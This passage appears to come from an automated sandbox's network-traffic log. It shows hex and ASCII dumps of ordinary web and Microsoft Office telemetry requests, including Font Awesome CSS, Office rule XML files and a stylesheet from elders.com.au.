                                                                                                                                                                                                            Data Ascii: ck-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 33 22 7d 2e 66 61 2d 66 6c 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 34 22 7d 2e 66 61 2d 68 65 61 64 70 68 6f 6e 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 35 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 36 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 37 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 38 22 7d 2e 66 61 2d 71 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 39 22 7d 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b
                                                                                                                                                                                                            Data Ascii: e{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 38 22 7d 2e 66 61 2d 66 61 73 74 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 39 22 7d 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 61 22 7d 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 62 22 7d 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 63 22 7d 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 64 22 7d 2e 66 61 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 65 22 7d 2e 66 61 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e
                                                                                                                                                                                                            Data Ascii: re{content:"\f048"}.fa-fast-backward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{con
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 66 61 2d 65 79 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 30 22 7d 2e 66 61 2d 77 61 72 6e 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 31 22 7d 2e 66 61 2d 70 6c 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 32 22 7d 2e 66 61 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 33 22 7d 2e 66 61 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 34 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62 65 66
                                                                                                                                                                                                            Data Ascii: fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:bef
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 35 22 7d 2e 66 61 2d 73 71 75 61 72 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 36 22 7d 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 37 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 38 22 7d 2e 66 61 2d 74 77 69 74 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 39 22 7d 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 61 22 7d 2e 66 61 2d 67 69 74 68 75 62 3a 62 65 66 6f 72 65 7b 63 6f
                                                                                                                                                                                                            Data Ascii: hone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{co
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 5c 66 30 63 36 22 7d 2e 66 61 2d 73 61 76 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 6c 6f 70 70 79 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 37 22 7d 2e 66 61 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 38 22 7d 2e 66 61 2d 6e 61 76 69 63 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 6f 72 64 65 72 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 39 22 7d 2e 66 61 2d 6c 69 73 74 2d 75 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 61 22 7d 2e 66 61 2d 6c 69 73 74 2d 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 62 22 7d 2e 66 61 2d 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 62 65 66 6f
                                                                                                                                                                                                            Data Ascii: \f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:befo
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC1369INData Raw: 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 39 22 7d 2e 66 61 2d 70 61 73 74 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 69 70 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 61 22 7d 2e 66 61 2d 6c 69 67 68 74 62 75 6c 62 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 62 22 7d 2e 66 61 2d 65 78 63 68 61 6e 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 63 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 65 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 7b 63 6f 6e
                                                                                                                                                                                                            Data Ascii: efore{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{con


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            36192.168.2.45770713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                            x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052943Z-16547b76f7f9rdn9hC1DFWfk7s000000063000000000mm5r
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            37192.168.2.45770313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                            x-ms-request-id: 4fd4ee51-801e-00a0-0601-2f2196000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052943Z-17df447cdb57g7m7hC1DFW791s00000002cg000000005t03
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            38192.168.2.45770613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                            x-ms-request-id: bf748f03-f01e-001f-5f5f-2e5dc8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052943Z-17df447cdb5g2j9ghC1DFWev0800000002a0000000004x3r
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            39192.168.2.45770513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                            x-ms-request-id: 18242d92-601e-005c-0fb0-2ff06f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052943Z-15869dbbcc6b2ncxhC1DFW6618000000019g0000000092nw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            40192.168.2.45770413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                            x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052943Z-16547b76f7fp6mhthC1DFWrggn00000006a000000000a0p2
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            41192.168.2.457708162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC616OUTGET /etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Mon, 30 Sep 2024 10:02:26 GMT
                                                                                                                                                                                                            etag: W/"2075a2-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 585004
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210111-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1727690545.416811,VS0,VS0,VE1384
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0002be30be2-DFW
                                                                                                                                                                                                            2024-11-06 05:29:43 UTC754INData Raw: 37 64 33 37 0d 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 40 6b 65 79 66 72 61 6d 65 73 20 72 65 61 63 74 2d 6c 6f 61 64 69 6e 67 2d 73 6b 65 6c 65 74 6f 6e 7b 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 2e 72 65 61 63 74 2d 6c 6f 61 64 69 6e 67 2d 73 6b 65 6c 65 74 6f 6e 7b 2d 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 23 65 62 65 62 65 62 3b 2d 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 2d 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 31 2e 35 73 3b 2d 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 2d 70 73 65 75 64 6f 2d 65 6c 65 6d 65 6e 74 2d 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                            Data Ascii: 7d37@charset "UTF-8";@keyframes react-loading-skeleton{to{transform:translateX(100%)}}.react-loading-skeleton{--base-color:#ebebeb;--highlight-color:#f5f5f5;--animation-duration:1.5s;--animation-direction:normal;--pseudo-element-display:block;background
